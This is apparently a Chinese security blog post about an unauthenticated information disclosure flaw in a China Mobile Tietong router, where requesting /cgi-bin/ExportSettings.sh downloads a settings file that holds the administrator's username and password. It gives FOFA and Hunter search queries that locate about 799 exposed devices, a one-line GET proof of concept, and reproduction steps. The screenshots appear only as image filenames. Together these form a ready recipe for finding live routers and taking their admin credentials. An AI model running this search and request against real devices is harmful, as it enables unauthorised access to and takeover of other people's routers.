中移铁通禹路由 ExportSettings 敏感信息泄露漏洞

漏洞描述:

该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证,导致攻击者能够未授权获取到路由器设置信息,包含了后台管理员用户的账号和密码

fofa: title="互联世界 物联未来-登录"

鹰图: web.body="互联世界 物联未来-登录"

POC: GET /cgi-bin/ExportSettings.sh

漏洞复现:

fofa搜索,共有799条资产

image-20240513161645969

访问资产IP,在URL后拼接/cgi-bin/ExportSettings.sh,可以下载信息文件

image-20240513161759081

使用记事本查看,获取到了管理员登录账号和密码

image-20240513161934968

posted @ 2024-05-14 08:44  LeouMaster  阅读(169)  评论(0)    收藏  举报